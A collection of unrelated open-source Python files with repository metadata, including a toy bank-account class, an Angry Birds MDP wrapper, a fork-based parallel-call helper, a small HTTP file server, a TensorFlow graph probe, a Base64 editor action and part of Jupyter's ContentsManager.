    # below (overdrown uses its own local rate); kept for compatibility.
    interest = 0.05

    def __init__(self, account_holder, card_number, PIN):
        self.balance = 0
        self.holder = account_holder
        self.card_number = card_number
        self.PIN = PIN

    def day_of_birth(self):
        """ Checks if there is information about the date of birth of the user """
        if self.holder in Birthday_data:
            return Birthday_data[self.holder]
        return "There is no information about date of birth of this user in database please try again."

    def SSN_check(self):
        """Chechs if there is information about the SSN Code of the user """
        if self.holder in SSN:
            return SSN[self.holder]
        return "There is no information about CCN of this user in database please try again."

    def Database_information(self):
        """Return True when both the birthday and the SSN of the holder are
        on record; otherwise record the holder in ERROR and return False.

        FIX: previously fell off the end and returned None on failure;
        now returns False explicitly (callers compare with ``== True``,
        so behavior is unchanged).
        """
        if self.holder in Birthday_data and self.holder in SSN:
            return True
        if self.holder not in ERROR:
            ERROR[self.holder] = 'Unknown Entry'
        return False

    def CardIsValid(self):
        """Return True when the card number passes the Luhn checksum."""
        digits = self.card_number
        total = 0  # renamed from ``sum`` to avoid shadowing the builtin
        num_digits = len(digits)
        oddeven = num_digits & 1
        for count in range(num_digits):
            digit = int(digits[count])
            # Double every second digit, counting from the rightmost one;
            # a doubled digit > 9 contributes its digit sum (i.e. minus 9).
            if not ((count & 1) ^ oddeven):
                digit = digit * 2
            if digit > 9:
                digit = digit - 9
            total = total + digit
        return (total % 10) == 0

    def PIN_IsValid(self):
        """Return True when the stored PIN matches the PIN derived from the
        card number by this bank's encoding.

        Each PIN digit comes from the digit sum of one 4-digit group of the
        card number, bucketed through a per-group threshold table.  The
        tables reproduce the original if/elif ladders exactly: a sum ``s``
        maps to the count of thresholds that are <= s (bisect_right).
        """
        from bisect import bisect_right
        if not self.CardIsValid():
            return False
        thresholds = (
            (4, 9, 14, 18, 21, 23, 27, 30, 33),   # card digits 1-4
            (4, 8, 14, 18, 20, 23, 26, 30, 32),   # card digits 5-8
            (3, 9, 14, 18, 20, 23, 28, 30, 33),   # card digits 9-12
            (2, 7, 10, 14, 18, 22, 26, 30, 33),   # card digits 13-16
        )
        pin_digits = []
        for group_index, bounds in enumerate(thresholds):
            group = self.card_number[group_index * 4:(group_index + 1) * 4]
            digit_sum = sum(int(ch) for ch in group)
            pin_digits.append(bisect_right(bounds, digit_sum))
        answer = (1000 * pin_digits[0] + 100 * pin_digits[1]
                  + 10 * pin_digits[2] + pin_digits[3])
        return str(answer) == self.PIN

    def Account_Type_Info(self):
        """Checks the type of the account"""
        if self.holder in Account_Type:
            return Account_Type[self.holder]
        print("There is no information about you in current database")
        return False

    def Saving(self, amount):
        """Imposes a 0.5$ deposit fee"""
        return amount - 0.5

    def Checking(self, amount):
        """Imposes a 1$ withdrawal fee"""
        return amount - 1

    def Sequrity_Check(self):
        """Return True when card, PIN and database records all check out.

        (Method name kept as-is, typo included, for backward compatibility.)
        """
        message = 'Dear {0},'.format(self.holder)
        if self.CardIsValid() and self.PIN_IsValid() and self.Database_information():
            return True
        print(message)
        print("Trying to verify your account information from the database")
        if self.Database_information():
            print(message)
            print("Your information has been found in the database")
            return True
        print(message)
        print("There is no information about you in current database")
        return False

    def deposit(self, PIN):
        """Return a closure ``deposit_try(amount, PIN_attempt)`` that adds
        ``amount`` (minus the deposit fee) to the balance after verifying
        the PIN; three failed attempts lock the account.

        The ``PIN`` parameter is kept for interface compatibility but is not
        used -- the stored PIN is checked on every attempt.
        """
        message = 'Dear {0},'.format(self.holder)
        if not self.Sequrity_Check():
            print("An error occured during transaction")
            print("You provided incorrect information")
            return
        balance = self.balance
        failed_attempts = []  # FIX: record the attempt value, not the list itself

        def deposit_try(amount, PIN_attempt):
            nonlocal balance
            if len(failed_attempts) == 3:
                print(message)
                return "Your account is locked."
            if PIN_attempt != self.PIN:
                failed_attempts.append(PIN_attempt)
                print(message)
                return "Incorrect PIN"
            balance = self.Saving(balance + amount)
            self.balance = balance
        return deposit_try

    def withdraw(self, PIN):
        """Return a closure ``withdraw(amount, PIN_attempt)`` that removes
        ``amount`` (plus the withdrawal fee) after verifying the PIN; three
        failed attempts lock the account, and insufficient funds offer an
        interactive loan via overdrown().

        The ``PIN`` parameter is kept for interface compatibility but is not
        used -- the stored PIN is checked on every attempt.
        """
        message = 'Dear {0},'.format(self.holder)
        if not self.Sequrity_Check():
            print("An error occured during transaction")
            print("You provided incorrect information")
            return
        balance = self.balance
        failed_attempts = []  # FIX: record the attempt value, not the list itself

        def withdraw(amount, PIN_attempt):
            nonlocal balance
            if len(failed_attempts) == 3:
                print(message)
                return "Your account is locked."
            if PIN_attempt != self.PIN:
                failed_attempts.append(PIN_attempt)
                print(message)
                return "Incorrect PIN"
            if amount > balance:
                print ("Insufficient funds")
                print ("Do you want to apply for loan?")
                print("yes/no")
                variable = input('Your answer!:')
                if variable == 'yes':
                    return self.overdrown()
                return
            balance = self.Checking(balance - amount)
            self.balance = balance
        return withdraw

    def overdrown(self):
        """Interactively grant an overdraft loan of $250/$500/$1000, add it
        to the balance (minus the deposit fee), and optionally compute and
        return the loan rate for a 1/2/3-year term."""
        balance = self.balance
        message = 'Dear {0},'.format(self.holder)
        print(message)
        print ("Dear User Your Account Balance Can Be Negative")
        print("Indicate the amount you want apply for?")
        print ("1. $250")
        print ("2. $500")
        print ("3. $1000 (Another number will bring to $250) ")
        print ("Choose an option - 1 / 2 / 3")
        # Any input other than '1' or '2' selects option 3.
        option = input()
        if option == '1':
            balance = self.Saving(balance + 250)
        elif option == '2':
            balance = self.Saving(balance + 500)
        else:
            balance = self.Saving(balance + 1000)
        self.balance = balance
        print(self.balance)
        print ("Do you want to calculae the rate? yes/no")
        ans = input()
        interest = 0.0001
        if ans == 'yes':
            print("Indicate the duration of the loan?")
            print ("1. 1 year")
            print ("2. 2 years")
            print ("3. 3 year. (Another number will bring to 3 year) ")
            time = input()
            # BUG FIX: input() returns a string, so the original comparisons
            # ``time == 1`` / ``time == 2`` were always False and every loan
            # was rated as the 3-year option.  Compare against strings.
            if time == '1':
                rate = 250 * (0.7 + interest)
            elif time == '2':
                rate = 500 * pow((0.7 + interest), 2)
            else:
                rate = 1000 * pow((0.7 + interest), 3)
            return rate
        return
| {
"repo_name": "MicBrain/Bank_Account_Sample",
"path": "bank.py",
"copies": "1",
"size": "8206",
"license": "mit",
"hash": -4838618070273833000,
"line_mean": 25.2172523962,
"line_max": 103,
"alpha_frac": 0.6295393614,
"autogenerated": false,
"ratio": 2.9560518731988474,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4085591234598847,
"avg_score": null,
"num_lines": null
} |
#abAPI
#This API contains the definition of the Angry Birds as an approximate MDP (define states and their successors
# by manipulating the AngryBirdsGame class in AngryBirds.py). We also define a simplified version of the Game States
# by extracting all necessary information to run algorthms.
import os
import sys
import math
import time
import random
import pygame
current_path = os.getcwd()
sys.path.insert(0, os.path.join(current_path, "../pymunk-4.0.0"))
import pymunk as pm
from characters import Bird
from level import Level
#import imp
#AngryBirds = imp.load_source('AngryBirds', '/src/AngryBirds.py')
#from src import AngryBirds
import AngryBirds
class AngryBirdsMDP:
    """Approximate MDP wrapper around AngryBirdsGame.

    States are GameState snapshots; actions are (angle, distance) pairs for
    the slingshot.  Transitions are deterministic: succAndReward() performs
    the action and runs the simulation until the world is static.
    """

    # Initializes the game
    def __init__(self, startLevel=-1, repeat=False, levels=None):
        self.game = AngryBirds.AngryBirdsGame()
        self.show = False
        self.startLevel = startLevel
        self.repeat = repeat
        # FIX: avoid a shared mutable default argument (was ``levels=[]``).
        self.levels = [] if levels is None else levels

    def showLearning(self):
        """Render frames during succAndReward() simulations."""
        self.show = True

    def showState(self):
        """Run a short burst of frames with rendering on."""
        self.game.runFrames(40, show=True)

    def restart(self):
        self.game.restart()

    # Return the start state.
    def startState(self):
        """Reset the game (optionally to ``startLevel``) and return the
        initial GameState."""
        # TODO Initialize with different levels
        self.game = AngryBirds.AngryBirdsGame()
        if self.startLevel > -1:
            # BUG FIX: previously read ``self.level``, which is never set --
            # the attribute assigned in __init__ is ``startLevel``.
            self.game.startAtLevel(self.startLevel)
        return GameState(self.game)

    # Return set of actions possible from |state|.
    def actions(self, state):
        # If number of active birds > 0, return possible angles and slingshot
        # extensions.  Implemented by the agent (see GameAgent.py).
        raise NotImplementedError("Override me")

    def succAndReward(self, state, action):
        """Perform ``action`` = (angle, distance) from |state| and return the
        single deterministic successor as a (newState, reward) tuple.

        On a won end state the game advances (repeat / random level / next
        level); on a lost end state returns (None, -50000).
        """
        if state.isEnd():
            if state.isWin():
                if self.repeat:
                    self.game.restartGame()
                    return (GameState(self.game), 0)
                elif len(self.levels) > 0:
                    self.game.startAtLevel(random.choice(self.levels))
                    return (GameState(self.game), 0)
                else:
                    self.game.startNewLevel()
                    return (GameState(self.game), 0)
            else:
                # Lost: no successor, large negative reward.
                return (None, -50000)
        pastscore = self.game.getScore()
        angle, distance = action
        # Run action until the physics simulation settles.
        self.game.performAction(angle, distance)
        self.game.runUntilStatic(self.show)
        # Reward is the score gained by this shot.
        reward = self.game.getScore() - pastscore
        # Return the next state with probability 1.
        return (GameState(self.game), reward)

    def discount(self):
        """Undiscounted MDP."""
        return 1

    # Compute set of states reachable from startState. Helper function for
    # MDPAlgorithms to know which states to compute values and policies for.
    # This function sets |self.states| to be the set of all states.
    def computeStates(self):
        self.states = set()
        queue = []
        start = self.startState()
        self.states.add(start)
        queue.append(start)
        while len(queue) > 0:
            state = queue.pop()
            for action in self.actions(state):
                # BUG FIX: succAndReward() returns a single (state, reward)
                # pair, so unpack it directly instead of iterating over it.
                newState, reward = self.succAndReward(state, action)
                if newState not in self.states:
                    self.states.add(newState)
                    queue.append(newState)
class GameState():
    """Compact, game-independent snapshot used by planning algorithms."""

    def __init__(self, game):
        """Extract remaining birds, pig/poly summaries and level from ``game``."""
        self.nbirds = game.getNumberRemainingBirds()
        self.pigs = {'number': len(game.getPigs()),
                     'positions': game.getPigPositions()}
        self.polys = {'number': len(game.getPolys()),
                      'features': game.getPolyFeatures()}
        self.level = game.getLevel()

    def isEnd(self):
        """True once the episode is over: no birds left or no pigs left."""
        return not (self.nbirds and self.pigs['number'])

    def isWin(self):
        """True when all pigs are gone while birds remain."""
        return self.pigs['number'] == 0 and self.nbirds > 0

    def isLoose(self):
        """True when the player has run out of birds."""
        return not self.nbirds

    def getLevel(self):
        """Level the snapshot was taken in."""
        return self.level
| {
"repo_name": "imanolarrieta/angrybirds",
"path": "src/abAPI.py",
"copies": "1",
"size": "4277",
"license": "mit",
"hash": 4899484799628583000,
"line_mean": 30.6814814815,
"line_max": 164,
"alpha_frac": 0.6259060089,
"autogenerated": false,
"ratio": 3.81875,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.49446560089,
"avg_score": null,
"num_lines": null
} |
"""A bare-bones but effective way to run a target callable in parallel
using multiple processes.
POSIX specific.
The reason I opted to use this rather than 'import multiprocessing' is
that multiprocessing uses threads to listen in the background for
results returning on kids' sockets. If possible, I would rather not
initialize the threading mechanism at all* and gain a bit more
performance for my children.
* initializing the threading mechanism calls ceval.c:PyEval_InitThreads,
which incurs overhead for many future operations; avoiding threads
altogether can gain visible performance increases, especially when
doing locking intensive operations
"""
__author__ = 'Yaniv Aknin (yaniv@aknin.name)'
import os
from select import select
from cPickle import dumps, loads
import traceback
from collections import namedtuple
# (current, total) identity handed to each child when pass_child_numbers=True.
ChildNumbers = namedtuple("ChildNumbers", "current, total")
# NOTE: makes waitpid() below more readable
NO_OPTIONS = 0
class ExceptionsRaisedInChildren(Exception):
    """Raised by process_results() when at least one child returned an
    exception and permit_exceptions is False; carries the exception list."""
    pass
def multicall(target, args=None, kwargs=None, how_many=None,
              permit_exceptions=False, pass_child_numbers=False):
    """Run *target* in *how_many* forked children and collect the results.

    Each child pickles its return value (or the exception it raised) down a
    pipe; the parent drains the pipes in parallel, reaps the children and
    unpickles the results.
    """
    call_args = args or []
    call_kwargs = kwargs or {}
    pids, pipes = fork_children(target, call_args, call_kwargs, how_many,
                                pass_child_numbers)
    raw_results = read_raw_results_in_parallel(pipes)
    # RANT: I used to think Unix terminology is funny...
    # as I get older, 'reap dead children' gets less funny.
    reap_dead_children(pids)
    return process_results(raw_results, permit_exceptions)
def fork_children(target, args, kwargs, how_many, pass_child_numbers):
    # Fork `how_many` children; each child writes its pickled result to its
    # own pipe and never returns.  Returns (child pids, {read_fd: []}) where
    # each fd's list will accumulate the raw chunks read from it.
    pids = []
    pipes = {}
    for number in xrange(how_many):
        read_fd, write_fd = os.pipe()
        if pass_child_numbers:
            # Copy kwargs so each child gets its own child_numbers entry.
            kwargs = dict(kwargs)
            kwargs['child_numbers'] = ChildNumbers(current=number, total=how_many)
        pid = os.fork()
        if pid == 0:
            # Child: close the unused read end, run the target; never returns.
            os.close(read_fd)
            exec_child_and_never_return(write_fd, target, args, kwargs)
        # Parent: close the unused write end and remember the child.
        os.close(write_fd)
        pids.append(pid)
        pipes[read_fd] = []
    return pids, pipes
def read_raw_results_in_parallel(pipes):
    """Drain every child pipe, multiplexing with select().

    *pipes* maps read fds to lists of received chunks; a pipe is finished
    (and its accumulated chunks collected) once read() signals EOF.
    """
    raw_results = []
    while pipes:
        readable = select(pipes, [], [])[0]
        for fd in readable:
            chunk = os.read(fd, 4096)
            if chunk:
                pipes[fd].append(chunk)
            else:
                # EOF: the child closed its end; collect its chunks.
                raw_results.append(pipes.pop(fd))
    return raw_results
def reap_dead_children(pids):
    """waitpid() every child in *pids*, consuming the list as it goes."""
    while pids:
        child = pids.pop()
        reaped, dummy_status = os.waitpid(child, NO_OPTIONS)
        assert child == reaped
def process_results(raw_results, permit_exceptions):
    """Unpickle each child's concatenated output; surface child exceptions.

    Raises ExceptionsRaisedInChildren unless *permit_exceptions* is set.
    """
    results = [loads("".join(chunks)) for chunks in raw_results]
    errors = [result for result in results if isinstance(result, Exception)]
    if errors and not permit_exceptions:
        raise ExceptionsRaisedInChildren(errors)
    return results
def exec_child_and_never_return(write_fd, target, args, kwargs):
    """Child-side body: run *target*, pickle the outcome to *write_fd*, exit.

    An exception raised by *target* is sent back as the result object, with
    its formatted traceback attached as ``_traceback``.  The child always
    terminates via os._exit() so it never returns into the parent's code.
    """
    try:
        try:
            result = target(*args, **kwargs)
        # FIX: use the py2.6+/py3-compatible 'except ... as ...' syntax
        # instead of the legacy 'except Exception, error' form.
        except Exception as error:
            result = error
            result._traceback = traceback.format_exc()
        # NOTE: the following line may block if the parent buffer is full, that's cool with us
        os.write(write_fd, dumps(result))
    finally:
        # NOTE: no matter what, the child must exit here
        os._exit(0)
def test():
    # Smoke tests: plain pass-through of args, sleepy children finishing in
    # parallel, and children each producing ~1MB of pickled output.
    def plain_target(*args, **kwargs):
        return args
    def random_sleeps():
        from time import sleep
        from random import random
        sleep(random())
        return 42
    def large_output():
        return 'a' * 2**20
    PROCESSES = 32
    assert multicall(plain_target, (1,2,3), how_many=PROCESSES) == [(1,2,3)] * PROCESSES
    assert multicall(random_sleeps, how_many=PROCESSES) == [42] * PROCESSES
    assert multicall(large_output, how_many=PROCESSES) == ['a' * 2**20] * PROCESSES
if __name__ == "__main__":
    test()
| {
"repo_name": "yaniv-aknin/labour",
"path": "labour/tester/multicall.py",
"copies": "1",
"size": "4096",
"license": "mit",
"hash": -3151217383089081000,
"line_mean": 33.7118644068,
"line_max": 94,
"alpha_frac": 0.6525878906,
"autogenerated": false,
"ratio": 3.775115207373272,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.990812412636971,
"avg_score": 0.003915794320712402,
"num_lines": 118
} |
"""A barebones HTTP server example."""
import subprocess
import traceback
import util
class SimpleHTTPHandler(util.server.Server):
    """A hello world kind of an HTTP server."""

    def process_request(self, connection, address):
        """Send the requested file to the connection socket."""
        request = util.http.HTTPRequest(connection, self.max_recv_size)
        content_type, content = self.file_contents(request.path)
        util.http.HTTPResponse(
            200,
            {'Content-Type': content_type, 'Connection': 'close'},
            content,
        ).send(connection, address)
        return self

    def file_contents(self, path):
        """Return a tuple (content_type, content) for the given file path."""
        if not path.exists():
            raise util.http.HTTPException(path, 404)
        if not path.is_file():
            # Not a regular file (e.g. a directory): serve an `ls -al` listing.
            listing = subprocess.Popen(
                ['ls', '-al', str(path.realpath())],
                stdout=subprocess.PIPE,
            ).communicate()[0]
            return 'text/plain', listing
        with path.open('rb') as stream:
            return path.type, stream.read()

    def handle_connection(self, connection, address):
        """Serve one request, turning failures into HTTP error responses
        before re-raising them for the server's own logging."""
        try:
            self.process_request(connection, address)
        except util.http.HTTPException as http_error:
            http_error.send(connection, address)
            raise
        except Exception:
            util.http.HTTPException(
                traceback.format_exc(), 500
            ).send(connection, address)
            raise
| {
"repo_name": "cheeseywhiz/cheeseywhiz",
"path": "socket/httpsrv.py",
"copies": "1",
"size": "1590",
"license": "mit",
"hash": -4473114615410046500,
"line_mean": 32.125,
"line_max": 79,
"alpha_frac": 0.5918238994,
"autogenerated": false,
"ratio": 4.504249291784703,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5596073191184703,
"avg_score": null,
"num_lines": null
} |
""" A barebones workflow for experimentally probing a pretrained tensorflow
graph_def (*.pb) file.
"""
from __future__ import print_function, division
import numpy as np
import tensorflow as tf
# SETTINGS
tensorboard_dir = "/tmp/tf"
graph_file = "mygraph.pb"

tf_graph = tf.Graph()
with tf_graph.as_default():
    # with tf.variable_scope('inputs') as scope:
    #     tf_X = tf.placeholder(tf.float32, shape=(3, 4))

    # LOAD GRAPH_DEF FILE
    access_these = []    # operations to extract
    remap_input = None   # remap pretrained model input to a new tensor
    with tf.device('/cpu:0'):  # Prevent multiple parallel I/O operations
        with tf.gfile.FastGFile(graph_file, 'rb') as file_obj:
            # Load the graph from file
            graph_def = tf.GraphDef()
            graph_def.ParseFromString(file_obj.read())
            # Extract particular operations/tensors
            requested_ops = tf.import_graph_def(
                graph_def,
                name='',
                return_elements=access_these,
                input_map=remap_input
            )
    print(requested_ops)

    # TENSORBOARD
    with tf.variable_scope('tensorboard') as scope:
        tf_summary_writer = tf.summary.FileWriter(tensorboard_dir, graph=tf_graph)
        tf_summary_op = tf.summary.scalar(name="dummy", tensor=4)

# INTERACTIVE MODE
sess = tf.Session(graph=tf_graph)
# sess.run(tf.global_variables_initializer())

# RUN TENSORBOARD
summary_str = sess.run(tf_summary_op)
tf_summary_writer.add_summary(summary_str, 0)
tf_summary_writer.flush()
# tensorboard --logdir="/tmp/tf"
# 0.0.0.0:6006

# INPUTS
# X = np.random.randn(3,4)
# feed_dict = {tf_X: X}
# output = sess.run(tf_y, feed_dict=feed_dict)
# print(output)

# PROBE OPERATIONS
# Get a list of all the operations in a graph
tf_graph.get_operations()
# Get a list of all the operation names in a graph
# BUG FIX: this previously referenced an undefined name ``graph``;
# the graph object built above is ``tf_graph``.
[op.name for op in tf_graph.get_operations()]
# Get specific operations/tensors
# tf_graph.get_operation_by_name("layer1")
# tf_graph.get_tensor_by_name("layer1:0")
sess.close()
| {
"repo_name": "ronrest/convenience_py",
"path": "ml/tf/probe_graphdef_file.py",
"copies": "1",
"size": "2071",
"license": "apache-2.0",
"hash": 307577671181354600,
"line_mean": 28.1690140845,
"line_max": 82,
"alpha_frac": 0.6518590053,
"autogenerated": false,
"ratio": 3.303030303030303,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9448785236330253,
"avg_score": 0.001220814400010056,
"num_lines": 71
} |
# a bar plot with errorbars
import numpy as np
import matplotlib.pyplot as plt
import itertools
def bar_chart(mean_lists, std_lists, group_labels, tick_labels, colors_list=[], set_separation=.5, side_buffer=0.1):
    '''Draw a grouped bar chart with error bars and per-bar value labels.

    modified from http://matplotlib.org/examples/api/barchart_demo.html (May 10, 2015)

    Parameters
    ----------
    mean_lists : list of sequences, one sequence of bar heights per group
    std_lists : list of sequences, matching error-bar magnitudes
    group_labels : legend label per group
    tick_labels : x tick label per cluster of bars
    colors_list : optional color per group (auto-generated when empty)
    set_separation : horizontal gap between clusters, in bar widths
    side_buffer : padding added on each side of the x axis

    The axis of the plot is returned so that the user may add axes labels,
    plot title, and legend, and make modifications.
    '''
    def autolabel(rects):
        # attach the (integer) height as a text label above each bar
        for rect in rects:
            height = rect.get_height()
            ax.text(rect.get_x()+rect.get_width()/2., 1.02*height, '%d'%int(height),
                    ha='center', va='bottom')

    N = max([len(i) for i in mean_lists]) # number of bars in the widest group
    num_groups = len(mean_lists)
    if not colors_list:
        colormap = plt.cm.rainbow # see choosing colormaps at http://matplotlib.org/users/colormaps.html
        colors_list = [colormap(i) for i in np.linspace(0, 0.9, num_groups)]
    # Check that the parallel lists all describe the same number of groups.
    # FIX: the loop variable previously shadowed the builtin ``list``, and the
    # reported lengths omitted mean_lists itself.
    companions = [std_lists, group_labels, colors_list]
    if any(len(seq) != num_groups for seq in companions):
        lengths = [num_groups] + [len(seq) for seq in companions]
        raise Exception('mean_list, std_lists, group_labels and colors_list must all be of the same length. they are {} long respectively.'.format(lengths))
    width = 1.0/(num_groups+set_separation)
    ind = np.arange(N)+set_separation # the x locations for the groups. note each value is the left most edge of a bar.
    fig, ax = plt.subplots()
    bar_groups = [] # collect for legend and labeling purposes
    x_max = -np.inf
    x_min = np.inf
    for n, (means, stds, labels, color) in enumerate(itertools.izip(mean_lists, std_lists, group_labels, colors_list)):
        left = ind+(n*width)
        bar_set = ax.bar(left, means, width, color=color, yerr=stds, label=labels) # add bar graphs
        autolabel(bar_set)
        bar_groups.append(bar_set)
        # track the horizontal extent so the axis can be fit snugly below
        if x_max < left[-1]:
            x_max = left[-1]
        if x_min > left[0]:
            x_min = left[0]
    ax.set_xlim(left=x_min-side_buffer, right=x_max+width+side_buffer)
    # center the tick under each cluster of bars
    tick_positions = ind + (width*num_groups/2)
    ax.set_xticks(tick_positions)
    ax.set_xticklabels( tick_labels )
    return plt.gca()
if __name__ == '__main__':
    # Demo/smoke-test of bar_chart with a few grouping layouts.
    # fake data: five measurements per group, with per-measurement error bars
    menMeans = (20, 35, 30, 35, 27)
    menStd = (2, 3, 4, 1, 2)
    womenMeans = (25, 32, 34, 20, 25)
    womenStd = (3, 5, 2, 3, 3)
    intersexMeans = (23,22,22,15,31)
    intersexStd = (0,0,0,0,0)#(1,4,1,5,2)
    # group data + setup
    colors = ['r','purple','g']
    means = [menMeans, womenMeans, intersexMeans]
    stds = [menStd, womenStd, intersexStd]
    # 3 group bar chart (colors omitted here, so bar_chart auto-picks them)
    ax = bar_chart(means,stds,('Men','Women','Intersex'),('G1', 'G2', 'G3', 'G4', 'G5'))#, colors)
    ax.legend(loc=8)
    plt.show()
    # 2 group bar chart
    ax = bar_chart(means[:2],stds[:2],('Men','Women'),('G1', 'G2', 'G3', 'G4', 'G5'), colors[:2])
    ax.legend(loc=8)
    plt.show()
    #### other way: transpose the data so each measurement (G1..G5) becomes a
    #### "group" and each gender becomes a tick position
    # NOTE(review): zip returns a list on Python 2 but a lazy iterator on
    # Python 3; this transposed demo assumes list behavior -- verify on py3.
    means = zip(menMeans,womenMeans)
    stds = zip(menStd,womenStd)
    colors = ['r','b','g','m','c']
    ax = bar_chart(means,stds,('G1', 'G2', 'G3', 'G4', 'G5'),('Men','Women'),colors)
    ax.legend(loc=8)
    means = zip(menMeans,womenMeans,intersexMeans)
    stds = zip(menStd,womenStd,intersexStd)
    colors = ['r','b','g','m','c']
    ax = bar_chart(means,stds,('G1', 'G2', 'G3', 'G4', 'G5'),('Men','Women','Intersex'),colors)
    ax.legend(loc=8)
    plt.show()
| {
"repo_name": "drcgw/IPython-Big-Data",
"path": "Project-1-Sequencing/Master Notebook/multigroup_barchart.py",
"copies": "1",
"size": "4663",
"license": "bsd-3-clause",
"hash": -3943400293440957400,
"line_mean": 33.7985074627,
"line_max": 168,
"alpha_frac": 0.5640145829,
"autogenerated": false,
"ratio": 3.104527296937417,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.8938347246014289,
"avg_score": 0.0460389267646257,
"num_lines": 134
} |
'''A Base64 Encodeing action for the Manipulate plugin for Coda'''
import cp_actions as cp
import base64
def act(controller, bundle, options):
    '''
    Required action method: Base64-encode (or decode) the current selection.

    Setting decode=True in `options` will decode instead of encoding.
    '''
    context = cp.get_context(controller)
    should_decode = cp.get_option(options, 'decode', False)
    selection, sel_range = cp.selection_and_range(context)

    # nothing selected -> nothing to do
    if sel_range.length == 0:
        return

    if not should_decode:
        # encoding always succeeds; replace the selection with its base64 form
        cp.insert_text(context, base64.b64encode(selection), sel_range)
        return

    # decode path: invalid/badly padded base64 raises TypeError from
    # base64.b64decode -- in that case we silently leave the text alone
    try:
        decoded = base64.b64decode(selection)
    except TypeError:
        return
    # b64decode also tends to return an empty string for junk input, which is
    # equally useless -- bail out rather than wiping the selection
    if sel_range.length and not len(decoded):
        return
    cp.insert_text(context, decoded, sel_range)
cp.insert_text(context, text, range) | {
"repo_name": "bobthecow/ManipulateCoda",
"path": "src/Support/Scripts/Base64Encode.py",
"copies": "1",
"size": "1085",
"license": "mit",
"hash": 2854165040161782300,
"line_mean": 26.8461538462,
"line_max": 80,
"alpha_frac": 0.6147465438,
"autogenerated": false,
"ratio": 4.392712550607287,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5507459094407288,
"avg_score": null,
"num_lines": null
} |
"""A base class for contents managers."""
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from fnmatch import fnmatch
import itertools
import json
import os
import re
from tornado.web import HTTPError, RequestHandler
from ...files.handlers import FilesHandler
from .checkpoints import Checkpoints
from traitlets.config.configurable import LoggingConfigurable
from nbformat import sign, validate as validate_nb, ValidationError
from nbformat.v4 import new_notebook
from ipython_genutils.importstring import import_item
from traitlets import (
Any,
Bool,
Dict,
Instance,
List,
TraitError,
Type,
Unicode,
validate,
default,
)
from ipython_genutils.py3compat import string_types
from notebook.base.handlers import IPythonHandler
from notebook.transutils import _
copy_pat = re.compile(r'\-Copy\d*\.')
class ContentsManager(LoggingConfigurable):
    """Base class for serving files and directories.

    This serves any text or binary file,
    as well as directories,
    with special handling for JSON notebook documents.

    Most APIs take a path argument,
    which is always an API-style unicode path,
    and always refers to a directory.

    - unicode, not url-escaped
    - '/'-separated
    - leading and trailing '/' will be stripped
    - if unspecified, path defaults to '',
      indicating the root path.
    """

    root_dir = Unicode('/', config=True)

    allow_hidden = Bool(False, config=True, help="Allow access to hidden files")

    notary = Instance(sign.NotebookNotary)
    def _notary_default(self):
        # lazily construct the notary used to sign/trust notebooks
        return sign.NotebookNotary(parent=self)

    hide_globs = List(Unicode(), [
            u'__pycache__', '*.pyc', '*.pyo',
            '.DS_Store', '*.so', '*.dylib', '*~',
        ], config=True, help="""
        Glob patterns to hide in file and directory listings.
    """)

    untitled_notebook = Unicode(_("Untitled"), config=True,
        help="The base name used when creating untitled notebooks."
    )

    untitled_file = Unicode("untitled", config=True,
        help="The base name used when creating untitled files."
    )

    untitled_directory = Unicode("Untitled Folder", config=True,
        help="The base name used when creating untitled directories."
    )

    pre_save_hook = Any(None, config=True, allow_none=True,
        help="""Python callable or importstring thereof

        To be called on a contents model prior to save.

        This can be used to process the structure,
        such as removing notebook outputs or other side effects that
        should not be saved.

        It will be called as (all arguments passed by keyword)::

            hook(path=path, model=model, contents_manager=self)

        - model: the model to be saved. Includes file contents.
          Modifying this dict will affect the file that is stored.
        - path: the API path of the save destination
        - contents_manager: this ContentsManager instance
        """
    )

    @validate('pre_save_hook')
    def _validate_pre_save_hook(self, proposal):
        # accept either a callable or a dotted importstring naming one
        value = proposal['value']
        if isinstance(value, string_types):
            value = import_item(self.pre_save_hook)
        if not callable(value):
            raise TraitError("pre_save_hook must be callable")
        return value

    def run_pre_save_hook(self, model, path, **kwargs):
        """Run the pre-save hook if defined, and log errors"""
        if self.pre_save_hook:
            try:
                self.log.debug("Running pre-save hook on %s", path)
                self.pre_save_hook(model=model, path=path, contents_manager=self, **kwargs)
            except Exception:
                # a failing hook must not abort the save itself
                self.log.error("Pre-save hook failed on %s", path, exc_info=True)

    checkpoints_class = Type(Checkpoints, config=True)
    checkpoints = Instance(Checkpoints, config=True)
    checkpoints_kwargs = Dict(config=True)

    @default('checkpoints')
    def _default_checkpoints(self):
        return self.checkpoints_class(**self.checkpoints_kwargs)

    @default('checkpoints_kwargs')
    def _default_checkpoints_kwargs(self):
        return dict(
            parent=self,
            log=self.log,
        )

    files_handler_class = Type(
        FilesHandler, klass=RequestHandler, allow_none=True, config=True,
        help="""handler class to use when serving raw file requests.

        Default is a fallback that talks to the ContentsManager API,
        which may be inefficient, especially for large files.

        Local files-based ContentsManagers can use a StaticFileHandler subclass,
        which will be much more efficient.

        Access to these files should be Authenticated.
        """
    )

    files_handler_params = Dict(
        config=True,
        help="""Extra parameters to pass to files_handler_class.

        For example, StaticFileHandlers generally expect a `path` argument
        specifying the root directory from which to serve files.
        """
    )

    def get_extra_handlers(self):
        """Return additional handlers

        Default: self.files_handler_class on /files/.*
        """
        handlers = []
        if self.files_handler_class:
            handlers.append(
                (r"/files/(.*)", self.files_handler_class, self.files_handler_params)
            )
        return handlers

    # ContentsManager API part 1: methods that must be
    # implemented in subclasses.

    def dir_exists(self, path):
        """Does a directory exist at the given path?

        Like os.path.isdir

        Override this method in subclasses.

        Parameters
        ----------
        path : string
            The path to check

        Returns
        -------
        exists : bool
            Whether the path does indeed exist.
        """
        raise NotImplementedError

    def is_hidden(self, path):
        """Is path a hidden directory or file?

        Parameters
        ----------
        path : string
            The path to check. This is an API path (`/` separated,
            relative to root dir).

        Returns
        -------
        hidden : bool
            Whether the path is hidden.
        """
        raise NotImplementedError

    def file_exists(self, path=''):
        """Does a file exist at the given path?

        Like os.path.isfile

